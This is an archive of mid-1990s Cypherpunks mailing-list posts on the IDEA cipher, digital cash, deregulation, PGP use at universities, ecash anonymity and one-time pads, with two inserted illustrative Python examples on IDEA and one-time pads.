The results of each round from steps 11, 12, 13, and 14 form the input blocks for the second round of operation after swapping the two inner blocks (see figure). After eight rounds are over, the following transformation has to be done before taking output cipher text. It should be noted that swapping is not done for the last round.

[1] Multiply X1 and the 49th key subblock K49 (Z1^9)
[2] Add X2 and the 50th key subblock to k50 (Z2^9)
[3] Add X3 and the 51st key subblock k51 (Z3^9)
[4] Multiply X4 and the 52nd key subblock K51(Z3^9)

The decryption algorithm is also exactly the same except for the change in the subblock keys. From each of the key subblocks in the encryption, either additive inverse or multiplicative inverse is used. For example, the subblock key used to multiply this data subblock is replaced with its multiplicative inverse. Also the order in which that multiplicative and additive inverse occurs in the decryption algorithm takes care of the shuffling of the intermediate data subblocks.

As stated earlier the encryption key is 128 bits long. The 52 encryption subblock keys are derived from the encryption key, and the corresponding subblock keys are derived from the encryption-key subblocks. The key subblocks for the first round of encryption are derived by dividing the 128-bit-long key into 16-bit blocks. Then, for every next round, the encryption key is circularly shifted by 25 bits and then divided into 16-bit blocks to yield encryption-key subblocks. In the last round, only the first four key subblocks are generated.

The Idea can be implemented in all three modes of operation: ECB, output-feedback mode (OFB) and cipher-feedback mode (CFB). In ECB, the input is split into 64-bit blocks, encrypted and transmitted. In CFB, the output cipher text from one block of encryption is used to form part of an input block. And the output of the algorithm is XORed with the input plain text, and transmitted. Similarly, the feedback is taken after the XORing operation. In the present implementation, only ECB mode is done, which is the fastest among the three.

Since all the operations are on 16-bit blocks, the powerful instruction set of 561xx can be used for efficient implementation. The modulo 2^16 + 1 multiplication operation is used many times, and it is computationally intensive when compared with XOR and modulo 2^16 addition. The fixed-point multiplication construction of 561xx can be utilized to perform 32-bit multiplication.

The modulo 2^16 addition operation can be done just by ignoring the carry of 16-bit addition in 561xx. The XOR operation is also supported in one instruction as in any other DSP processor. Hence all three algebraic operations can be implemented efficiently using the instruction set of 561xx.

Again the decryption algorithm is exactly the same as the encryption algorithm, except that the decryption-key subblock is used instead of encryption. The whole program can be reused for decryption by changing the input variables and output variables.

Circular shift 
The main computation in encryption-key subblock generation is the circular shift of the 128-bit-long key. The encryption key can be stored as eight words in memory. In the present implementation, instead of shifting the key circularly, the mask patterns are used to pick up suitable key subblocks. That is, the second set of eight key subblocks can be generated by picking up 16 bits from the ninth bit of the second word of the encryption key.

Hence, for each round, we need to multiply each encryption key word by a suitable mask pattern, and left shift it with a suitable number of bits. The left-shifting operation for any arbitrary number of bits can be performed using the integer multiplication. Storing the mask patterns can be eliminated by using the shifted version of left-shift constants as right-shift constants. The left-shift constant is multiplied with the current encryption-key word, and the right-shift constant is multiplied with the next keyword, and both are combined to generate one key subblock. The right-shift constants are gotten by right shifting the left shift constant by 1 bit, which considerably reduces the computation involved. The current implementation of Idea in ECB on Motorola's DSP 56166 running at 60 Mhz supports up to 625 kbits/second in full-duplex mode. That is 3.6 times faster than using the DES algorithm.
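
Added example, not part of the EE Times article and not Motorola's DSP code: a Python walk-through of the 14 round steps, the 25-bit-rotation key schedule and the inverse-subkey decryption described in the message above. All function names are this example's own; the key and plaintext in the demo are the widely published IDEA reference test vector.

```python
"""IDEA on 64-bit blocks, following the article's 14 round steps (added example)."""
import struct

MASK16 = 0xFFFF
MOD_MUL = 0x10001  # 2^16 + 1, which is prime


def mul(a, b):
    """Multiply modulo 2^16 + 1; the all-zero word stands for 2^16."""
    return ((a or 0x10000) * (b or 0x10000) % MOD_MUL) & MASK16


def add(a, b):
    """Add modulo 2^16 by discarding the carry."""
    return (a + b) & MASK16


def mul_inv(a):
    """Inverse under mul(), via Fermat's little theorem."""
    return pow(a or 0x10000, MOD_MUL - 2, MOD_MUL) & MASK16


def add_inv(a):
    """Inverse under add()."""
    return (-a) & MASK16


def expand_key(key):
    """52 subkeys: cut the key into eight words, rotate it left 25 bits, repeat."""
    if len(key) != 16:
        raise ValueError("IDEA key must be 16 bytes")
    k = int.from_bytes(key, "big")
    subkeys = []
    while len(subkeys) < 52:
        subkeys += [(k >> (112 - 16 * i)) & MASK16 for i in range(8)]
        k = ((k << 25) | (k >> 103)) & ((1 << 128) - 1)
    return subkeys[:52]


def invert_key(ek):
    """Decryption subkeys: inverses of the encryption subkeys, last round first."""
    dk = []
    for r in range(9):
        base = 6 * (8 - r)
        a, b, c, d = ek[base:base + 4]
        if 0 < r < 8:
            b, c = c, b  # accounts for the inner-block swap between rounds
        dk += [mul_inv(a), add_inv(b), add_inv(c), mul_inv(d)]
        if r < 8:
            dk += ek[base - 2:base]  # K5, K6 of the matching encryption round
    return dk


def crypt_block(block, sk):
    """Run one 8-byte block through eight rounds plus the output transformation."""
    if len(block) != 8 or len(sk) != 52:
        raise ValueError("need an 8-byte block and 52 subkeys")
    x1, x2, x3, x4 = struct.unpack(">4H", block)
    for r in range(8):
        k1, k2, k3, k4, k5, k6 = sk[6 * r:6 * r + 6]
        s1 = mul(x1, k1)    # step 1
        s2 = add(x2, k2)    # step 2
        s3 = add(x3, k3)    # step 3
        s4 = mul(x4, k4)    # step 4
        s5 = s1 ^ s3        # step 5
        s6 = s2 ^ s4        # step 6
        s7 = mul(s5, k5)    # step 7
        s8 = add(s6, s7)    # step 8
        s9 = mul(s8, k6)    # step 9
        s10 = add(s7, s9)   # step 10
        # Steps 11, 12, 13, 14 in that order are the next round's X1..X4.
        x1, x2, x3, x4 = s1 ^ s9, s3 ^ s9, s2 ^ s10, s4 ^ s10
    k1, k2, k3, k4 = sk[48:52]
    # Output transformation; the inner blocks trade places once more here.
    out = (mul(x1, k1), add(x3, k2), add(x2, k3), mul(x4, k4))
    return struct.pack(">4H", *out)


def ecb(data, sk):
    """ECB mode: every 8-byte block is processed independently."""
    if len(data) % 8:
        raise ValueError("ECB input must be a multiple of 8 bytes")
    return b"".join(crypt_block(data[i:i + 8], sk) for i in range(0, len(data), 8))


if __name__ == "__main__":
    key = bytes.fromhex("00010002000300040005000600070008")  # reference test key
    plain = bytes.fromhex("0000000100020003")                # reference plaintext
    ek = expand_key(key)
    cipher = crypt_block(plain, ek)
    print("ciphertext:", cipher.hex())
    print("decrypted :", crypt_block(cipher, invert_key(ek)).hex())
```

Because `ecb` handles each block on its own, identical plaintext blocks yield identical ciphertext blocks, so the speed advantage the article cites for ECB comes with pattern leakage on repetitive data.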






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Sat, 28 Oct 95 01:30:49 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Mark Twain Bank's DigiCash offer
In-Reply-To: <9510271546.AA00580@ch1d157nwk>
Message-ID: <Pine.LNX.3.91.951028163159.21370B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995, Andrew Loewenstern wrote:
 
> The gotcha being that as long as your money is in the "mint" it is not under  
> FDIC protection...  Just how safe your cash is when it is in the mint is  
> entirely related to the security of Mark Twain's systems, which are  
> high-profile machines that will surely be subjected to many cracking  
> attempts.  Some may prefer to keep complete control over their cash and store  
> all of it themselves.  Unlike physical cash, this stuff can be split up,  
> encrypted, and stored in multiple places, possibly offering more security  
> than the Mark Twain "mint."

Unfortunately, it also expires (btw, how soon??):

----- 8< ----- quoted from http://www.marktwain.com/digifaq.html ---------
Once the money is on your hard drive, you can hold it (until expiration 
date - check this often), or spend it. 
--------------------------------------------------------------------------


Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 29 Oct 95 05:13:41 PST
To: cypherpunks@toad.com
Subject: Technology: The Great Deregulator
Message-ID: <v02120d00acb92e17a27f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


St. Pete (Peter Huber, that is) Speaks!

Cheers,
Bob Hettinga


--- begin forwarded text

Date: 27 Oct 1995 14:23:50 GMT
From: khh@access4.digex.net () (by way of rah@shipwright.com (Robert A.
Hettinga))
To: rah@shipwright.com
Subject: Technology: The Great Deregulator
Organization: Express Access Online Communications, Greenbelt, MD USA
Path:
sundog.tiac.net!daily-planet.execpc.com!news.moneng.mei.com!uwm.edu!chi-news
.cic.net!newsfeed.internetmci.com!in2.uu.net!news3.digex.net!access4.digex.n
et!not-for-mail
Newsgroups: alt.politics.economics
Lines: 91
NNTP-Posting-Host: access4-2.digex.net
X-Newsreader: TIN [UNIX 1.3 950824BETA PL0]
X-Newsreader: Value-Added NewsWatcher 2.0b27.1+

     Following is an article by Peter Huber. More articles by Mr. Huber
can be seen at http://khht.com/huber/home.html.

   -----------

   The sun is finally setting on a dismal century of economic commissars.
   Not Russia's, ours. I mean the people who, for most of this century,
   controlled price and output in markets for trucking, air travel,
   railroads, telephone service, cable TV, natural gas and electricity.
   Until recently, these mammoth industries, representing a sizable
   fraction of the U.S. economy, had about as much to do with free-market
   competition as the steel industry in Stalingrad.

   It started with the Interstate Commerce Commission. Established in
   1887, the ICC was to be the federal antidote to rapacious railroad
   monopolies. Perhaps it was, for a while, but in the end it drove them
   into bankruptcy. Meanwhile, local, state and federal legislators set
   up baby ICCs left and right on the assumption that highways,
   pipelines, phone wires and power grids all required much the same
   handling as railway track. In track-like industries, monopolies were
   natural. Competition was wasteful. Commissions were smart enough to
   run things better.

   Most of the people who believed such things died years ago, but the
   government pyramids they built have endured. A great decommissioning
   of economic life in America is now under way. The job is almost
   finished for airlines and trucks. It's inching ahead in the
   communications arena. Electricity is just getting started. We'll find
   out in due course whether Newt Gingrich and Bob Dole can deregulate as
   boldly as Ted Kennedy and Jimmy Carter, who kicked off serious
   economic deregulation in the 1970s.

   As the Kennedy/Carter legacy confirms, the impetus for change isn't
   hatred of government. Nor can the decommissioning of America be blamed
   on right-wing capitulation to big business. We've just learned the
   hard lessons of commissariat collectivism, in much the same way as the
   Hungarians and the Czechs.

   Consumers end-run the regulators. Fed up with prices that force them
   to subsidize residential consumers, factories and hospitals cogenerate
   electricity in their heating plants. They install "private branch"
   telephone exchanges that displace about one-third of the phone service
   they'd otherwise buy from the local phone company. Landlords set up
   rooftop satellite dishes on apartment buildings and sell "private
   cable" service to tenants. When you mow your own lawn, regulators get
   trimmed too: There's no income tax for them to collect, no maternity
   leave to grant, no minimum wage to enforce.

   Technology outwits the regulators. Hub-and-spoke routing and
   yield-maximizing pricing schemes concocted on supercomputers that
   shattered the old Civil Aeronautics Board's point-to-point vision of
   how air travel should operate, and at what price. The FCC's vision of
   "local" broadcasting provided by a few, community-based stations
   collapsed when Ted Turner began bouncing his UHF station off a
   satellite and back down to cable systems nationwide. And billions of
   dollars of commission-prescribed prices will soon have to be
   rejiggered because smart-aleck programmers have worked out how to
   transmit two-way voice conversations live over the Internet. The
   commission's policy is to price voice connections about $ 4 an hour
   higher than "data," but digital technology obliterates the
   distinction.

   Regulators are cannibals. As commissions proliferate, they undercut
   each other. Long distance phone companies and "access providers" like
   Teleport expand under lenient federal control -- at the expense of
   local phone companies kept on a tighter leash by state commissions.
   Wireless phone service has been almost completely deregulated by its
   federal regulators, so it grows far faster than service by way of
   telephone pole, which remains heavily regulated under the price
   regulation maintained by one bureau of the FCC. Direct broadcast
   satellite, cable's competitor, is booming under the hands-off watch of
   another bureau of the same federal commission.

   Regulators invest badly. They direct utilities to put billions in
   overpriced power plants, inefficient wires and extravagant service out
   to the very last ranch at the end of nowhere. Cost is no object; it
   just gets dumped in the "rate base." Competition, when it arrives, is
   devastating, just as the fall of the Berlin wall was devastating to
   the factories that built Trabants.

   In these times of radical technological change, utility monopolies are
   as unstable as politburos. Many of the old-guard enterprises may still
   grow and prosper, but only if they learn to sell to a whole new class
   of buyers. Consumers, not commissars.

--
   Copyright 1995 by Peter Huber. Electronic copies of this document may
   be distributed freely, provided that this notice accompanies all
   copies.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 29 Oct 95 10:27:58 PST
To: cypherpunks@toad.com
Subject: Digicash will not fly
Message-ID: <199510291827.KAA07985@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


While Chaum is a brilliant cryptographer, he is an incompetent businessman.

He has demonstrated this in numerous ways.

The latest being "Cash" where the bank skims off 4% to 10% every time.

No one is going to use digicash under these kinds of terms and 
conditions.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Thomas" <jathomas@netcom.com>
Date: Sun, 29 Oct 95 19:22:45 PST
To: cypherpunks@toad.com
Subject: Re: EE Times on IDEA
In-Reply-To: <Pine.SOL.3.91.951030075604.12602E-100000@orb>
Message-ID: <Pine.3.89.9510291955.A29391-0100000@netcom8>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 30 Oct 1995, Eric Young wrote:

> On Sat, 28 Oct 1995, Anonymous wrote:
> > Electronic Engineering Times
> > Oct 23, 1995 p. 66
> > 
> > T.R MADHUSUDAN SASTRY,
> > T. GANESAN, B.MADHUKAR
> > AND N. SRINIVASA
> 
> > involved. The current implementation of Idea in ECB on Motorola's DSP
> > 56166 running at 60 Mhz supports up to 625 kbits/second in full-duplex
> > mode. That is 3.6 times faster than using the DES algorithm. 
> 
> That last statement is rubbish.  For most CPU's I've seen, IDEA is either 
> the same speed as DES or a bit slower.  There is no way that it is 3 
> times faster than single DES.

My implementation of IDEA on the TI TMS320C26 DSP runs at 99 kbytes/sec.
I haven't tried DES, but comparing DES code on the 80x86 to the 'C26 
instruction set, I think the speeds would probably be about the same.

Whatever, these speeds leave plenty of time for simple speech coding in a 
voice encryption system.

---------------------------------------------------------------------
John A. Thomas          | (214) 263-4351   | jathomas@netcom.com
Bowles & Thomas, L.L.P. |      Voice       | CompuServe 75236,3536
410 N.W Eleventh St.    | (214) 262-6520   | 
Grand Prairie, Tx 75050 |       Fax        | PGP public key available
---------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 95 19:20:08 PST
To: cypherpunks@toad.com
Subject: Re: Important Digital Cash Question...
Message-ID: <199511010319.TAA15603@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>I think that the bankers name should be Ethel however.
>Wait, wait! I have another one. I call digital cash bankers "underwriters",
>because they're basically underwriting digital certificates, like an
>underwriter in the capital markets does.
>So, we need a "U" name...

Obviously Alice and Bob are banking with Chaum....
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 95 19:21:19 PST
To: cypherpunks@toad.com
Subject: Re: ecash remailer
Message-ID: <199511010321.TAA15848@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sameer and Hal both suggested ecash-laundering methods to provide 
payee anonymity using methods like this:
>Enterprising cypherpunk, Ed sets up the Ecash Remailer.
>Alice pays Bob e$15. Alice is anonymous.
>Bob sends Ed the e$15
>Ed cashes the e$ into his ecash mint account, withdraws e$13.50
>then pays Bob those e$14 .. Bob can now spend those e$ at will.
>	Bob is now anonymous.

As implemented here, Ed is strictly in the money-laundering business,
and can expect a visit from the Feds as soon as they can break through
the chain of digital mixes and crypto he uses to operate alt.money.laundry,
or follow the money when _he_ tries to deposit it.  On the other hand,
he could operate a strictly legitimate business, selling financial assets 
such as bearer bonds or low-commission lottery tickets, or converting
funds between different e-banks, or simply offering anonymous bank accounts
with currencies in multiple denominations - Bob can set up an account
with Ed's Eurocurrency Exchange in the name "Public Key nnnnn",
deposit his $15, and withdraw US$14.95 worth of Yen or Deutschmarks or
Kongbucks.

Aside from Bob's need to trust Ed, and his need to trust Alice not to
double-spend (since laundering used bills is much harder than laundering
marked bills) it first looked to me like Ed has a serious risk that he'd
be nabbed by the Feds as soon as he tried to spend the bills, so he has
to trust Bob not to be spending ransom money or pharmaceutical profits.

But as near as I can tell, _any_ merchant has that risk, because there's
no way for Ed to distinguish between cash that Bob withdrew himself
and cash that Bob got from someone else.  Does this mean that anybody
who sells goods to anonymous clients is automatically a money-launderer?
If so, either the bogus money-laundering laws have to go (yay!) 
or laws against selling to anonymous clients will get written (boo!) 
or selective enforcement and entrapment will become increasingly popular, 
leading merchants to refuse to do anonymous business just to defend themselves
against extortionists\\\\\\\\\\\\legitimate needs of law enforcement?
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 31 Oct 95 19:22:00 PST
To: black@suntan.eng.usf.edu
Subject: Re: PGP at Universities
Message-ID: <199511010321.TAA15856@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:37 PM 10/30/95 -0600, James Black black@suntan.eng.usf.edu wrote:
>>I am talking with one of the 
>>administration people about putting PGP on the system for everyone to 
>>use, but there are issues for them (the admin) as they might be liable, 
>>even if they can't read the e-mail.  What other legal considerations 
>>should be evaluated?
>>  Are there any large organizations (like any other universities) that 
>>allow their students to use PGP, and have the system in place to make it 
>>easier for the students?  If it is offered here I might be the one to add 
>>to the mail program (pine) that is generally used to transparently use 
>>PGP, which is what I mean by having a system set up for the encryption. 

Well, one obvious example is MIT, which not only makes PGP available to
its students, it makes it available to everyone else in the US,
though ostensibly not everyone else in the world.  Your University isn't
required to be reading students' and employees' private email anyway,
(though it can get away with it by announcing it as official policy),
so not being able to read it because of PGP is just fine - if anything it
may reduce their legal liability by offering students the option of having
truly private email, where sysadmins won't even be able to read bouncemail
or other fragments of messages left around when mailers break.

On the other hand, I'm guessing that usf.edu is in the USA?  If so, 
there may be ITAR considerations - are any of your students non-US citizens
without Green Cards?  Offensive as it sounds, it may not be legal to let
them use a copy of PGP that you provide (though it's perfectly legal for
them to import copies from the UK for their own use.)  There _are_ privacy-
protecting programs you can let them use, such as the next edition of Netscape,
which has 40-bit RC4, and you can use digital signatures from packages like
RIPEM-SIG, which is a signature-only subset of RIPEM that's approved for export.
Since Netscape 2 will be using X.509 certifications, which RIPEM uses,
you or your students can do things like building good friendly user interfaces
to the current character-menu certification chains that RIPEM provides
(somewhat like PGP's Web of Trust, but a bit clumsier for now.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@digicash.com>
Date: Tue, 31 Oct 95 19:23:43 PST
To: <cypherpunks@toad.com>
Subject: W3 Self-Regulation?
Message-ID: <v03003912acbc72d1d4cf@[129.46.82.80]>
MIME-Version: 1.0
Content-Type: text/plain


[Where's Tipper when you need her? Answer:]

FOR IMMEDIATE RELEASE

Contact:   Ron Warris, President, Internet Filtering Systems, Inc.
phone:     1-403-258-5804, email: warrisr@colt.t8000.com
Web:       www.tenagra.com/ifsi

DEMOCRATIC WORLD-WIDE WEB SELF-REGULATION ANNOUNCED

CALGARY, ALBERTA, CANADA -- October 30, 1995 -- Internet Filtering Systems,
Inc. (IFSI) today announced Net Shepherd, the first product designed to
democratically rate and filter World Wide Web sites and selectively
supervise access.

Net Shepherd is the first PICS-compliant rating and filtering solution.
Under the auspices of The World Wide Web Consortium, PICS (Platform for
Internet Content Selection) is a cross-industry working group whose goal is
to facilitate the development of technologies to give users control over
the kinds of material to which they and their children have access.

According to Ron Warris, president of IFSI, "There are a number of
companies offering filtering solutions. What is really needed is a rating
solution. How do you go about reviewing and rating 8.5 million volatile
documents on the Internet? Our approach will allow the people who surf the
Internet to be the people who rate the Internet. With Net Shepherd,
parents, educators and other concerned organizations will be able to
voluntarily participate in the rating process.

Mr. Warris continues, "Net Shepherd will also provide parents with the
ability to selectively filter documents viewed by their children. Parents
can choose from a variety of rating databases that represent the
accumulated ratings from others who hold similar views and philosophies.
Organizations that wish to create rating databases for their subscribers
will also be able to use Net Shepherd. You'll be able to subscribe to the
Good Housekeeping database or the Lutheran Church database or the ACLU
database. Take your pick.

"The Internet has always been self-regulating and special-interest-group
oriented. Now the World Wide Web can be as well."

IFSI's mission is to become the preferred and premier provider of Internet
rating systems and services for individual consumers, concerned groups and
associations, as well as other filter software developers. A World-Wide Web
site currently contains basic information about IFSI, and will evolve over
the coming weeks into an extensive resource for those interested in
Internet content filtering. It is located at URL

<http://www.tenagra.com/ifsi/>

From the Web page:

Internet Filtering Systems, Inc. is the developer of Net Shepherd, the
first product designed to democratically rate and filter World Wide Web
sites and selectively supervise access. The Internet has always been
self-regulating and special-interest-group oriented. Now the World Wide Web
can be as well.

Net Shepherd is the first PICS-compliant rating and filtering solution.
Under the auspices of The World Wide Web Consortium, PICS (Platform for
Internet Content Selection) is a cross-industry working group whose goal is
to facilitate the development of technologies to give users control over
the kinds of material to which they and their children have access.

Net Shepherd allows the people who surf the Internet to be the people who
rate the Internet. With Net Shepherd, parents, educators and other
concerned organizations will be able to voluntarily participate in the
rating process. Net Shepherd will also provide parents with the ability to
selectively filter documents viewed by their children. Parents can choose
from a variety of rating databases that represent the accumulated ratings
from others who hold similar views and philosophies. Organizations that
wish to create rating databases for their subscribers will also be able to
use Net Shepherd.

IFSI's mission is to become the preferred and premier provider of Internet
rating systems and services for individual consumers, concerned groups and
associations, as well as other filter software developers.


[cf. PICS (Platform for Internet Content Selection) at
  <http://www.w3.org/pub/WWW/PICS/>]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Tue, 31 Oct 95 18:55:34 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <199511010154.UAA00189@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> The Wall Street Journal, October 31, 1995, p. B6. 
> 
> IBM Announces New Software Code That Is Universal
> 
> By Laurie Hays
> 
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.

Oh Jesus.. now I've seen everything.

Bring forth the holy clue-grenade!

Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 31 Oct 95 19:21:35 PST
To: ecm@ai.mit.edu
Subject: Internet World Boston
Message-ID: <v02120d00acbc95ae5938@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


David Fox has me on a panel discussion he's leading tomorrow (November 1)
at Internet World in Boston in the Harborview Ballroom from 10:15 to 12:30.

Also on the panel will be someone each from First Virtual, Open Market, and
CheckFree, all of whom will be demo-ing their latest stuff. This promises
to be interesting, and it would also be a great opportunity for me to
actually meet some people I only read in e-mail.

If you're around, I hope to see you there!

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: walrus <walrus@tcgcs.com>
Date: Sun, 20 Oct 1996 00:34:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [crypto-philo]OTP or DES?
Message-ID: <199610200808.IAA15049@tcgcs.com>
MIME-Version: 1.0
Content-Type: text/plain


There is a thread going in coderpunks about some software company that
claims to have invented a software OTP that uses a PRNG.  The local experts
have ruled that this is impossible and I would have to agree, but this
thread got me thinking.  I would argue that the security of an OTP is
derived not from the fact that it really is secure, but from the fact that
it is claimed to be an OTP.  Imagine a plaintext, encrypted with triple-des.
It looks like a bunch of 1's and 0's to the casual observer, but to you it
is your secret plan to take over the world.  Or so you would have us believe
if we crack the cypher.  Actually you plan to take over the world using a
completely different plan.  It is quite easy to take the bits of the
des-encrypted message, and calculate the OTP key necessary to decrypt the
message into your real plan.  It would seem you could build a key to have
your message say anything of equal length.  Why then must a true OTP be
based on a true RNG?  Because one of the actual possible keys of a real OTP
is indeed the encrypted des message, you can claim that it is an otp and
no-one can prove otherwise.  They can say "But we cracked your des key and
can decypher this message!" and you say "nope I used an OTP, that is a false
message, here is what it really says! The fact that by PURE coincidence that
OTP could be decrypted using that particular key means nothing, because a
true OTP can generate that bit sequence."
So in conclusion I would say that we can give pgp complete and perfect
security by the simple process of changing the header from
---Begin PGP message--- to ----Begin OTP message----.  This makes you immune
from decryption because no one will ever know or can ever prove that the
decryption they got is the correct one.

Any comments?

Walrus
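
[Added example, not part of the original post: the pad calculation the
message above describes, showing that for a fixed ciphertext a pad exists for
every claimed plaintext of equal length. The SHA-256 keystream is a stand-in
for triple-DES, and all keys, texts and function names are constructed for
illustration.]

```python
import hashlib


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings (this is all an OTP does)."""
    if len(a) != len(b):
        raise ValueError("pad and message must be exactly the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def keystream(key: bytes, length: int) -> bytes:
    """Stand-in for the keyed cipher: SHA-256 in counter mode.

    Assumption: the post talks about triple-DES; any keyed cipher with a
    short key makes the same point, and this one needs only the stdlib.
    """
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def cipher_encrypt(key: bytes, plaintext: bytes) -> bytes:
    return xor(plaintext, keystream(key, len(plaintext)))


def cipher_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    return xor(ciphertext, keystream(key, len(ciphertext)))


def pad_for(ciphertext: bytes, claimed_plaintext: bytes) -> bytes:
    """Derive, after the fact, the pad that 'decrypts' ciphertext to any
    claimed plaintext of equal length: pad = ciphertext XOR claim."""
    return xor(ciphertext, claimed_plaintext)


def otp_decrypt(ciphertext: bytes, pad: bytes) -> bytes:
    return xor(ciphertext, pad)


# Constructed sample data (not from the post). Both texts are 33 bytes.
SHORT_KEY = b"constructed-cipher-key"
CIPHER_PLAINTEXT = b"attack at dawn via the north gate"
CLAIMED_PLAINTEXT = b"buy milk, eggs and bread at store"
CIPHERTEXT = cipher_encrypt(SHORT_KEY, CIPHER_PLAINTEXT)


def demo() -> dict:
    """Both decryptions of the same ciphertext, plus the two key sizes."""
    claimed_pad = pad_for(CIPHERTEXT, CLAIMED_PLAINTEXT)
    return {
        "with_cipher_key": cipher_decrypt(SHORT_KEY, CIPHERTEXT),
        "with_claimed_pad": otp_decrypt(CIPHERTEXT, claimed_pad),
        # The cipher key is short and fixed; the pad is always as long as
        # the message and can only be computed once the ciphertext exists.
        "cipher_key_len": len(SHORT_KEY),
        "pad_len": len(claimed_pad),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "=", value)
```

The pad that yields the cipher's own plaintext is simply the cipher's
keystream, which is the sense in which "a true OTP can generate that bit
sequence".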






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 1 Nov 1995 09:43:02 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Cryto article in SJ Mercenary
In-Reply-To: <Pine.SOL.3.91.951031140028.1151G-100000@chivalry>
Message-ID: <199510312340.AAA05687@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> There's a full page equivalent article on encryption in today's San Jose
> Mercury News (12E-11E). The article concentrates on public key
> cryptography, and mixes some good stuff with some silly mistakes. The
> first page has about 4/5th of the article devoted to a big diagram showing
> how someone using public key encryption to cover a whole message, and sent
> it over the internet to someone in Argentina. All this without a mention
> of using symmetric cyphers, and without even mentioning ITAR. 

I don't think ITAR is very relevant here.  After all, there are dozens
of RSA implementations available from outside the US, and they are not
patent-restricted like in the US.  It is really much easier to use and
get RSA *outside* the US than inside.  (For some pointers, see
"http://www.cs.hut.fi/crypto/".)  Besides, as far as I understand, one
of the RSA inventors wasn't even a US citizen...

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 1 Nov 1995 13:58:05 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: ecash remailer
In-Reply-To: <199511010321.TAA15848@ix8.ix.netcom.com>
Message-ID: <199511010542.AAA12674@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Responding to several subthreads at once:

Dave M., I get the feeling we're talking about completely different scenarios.
What I had in mind boils down to the case of Alice laundering money through
Ed with payer (and maybe payee) anonymity, then crying "Thief !" and getting
the bank to trace Ed. Without adding anything else, it's her word against his.

Aleph, I think you raise an important objection. After the money has been
through the wash a few (dozen) times, it's hard to tell whence it came. This 
leads into Bill's point:

Bill writes:
> But as near as I can tell, _any_ merchant has that risk, because there's
> no way for Ed to distinguish between cash that Bob withdrew himself
> and cash that Bob got from someone else.  Does this mean that anybody
> who sells goods to anonymous clients is automatically a money-launderer?
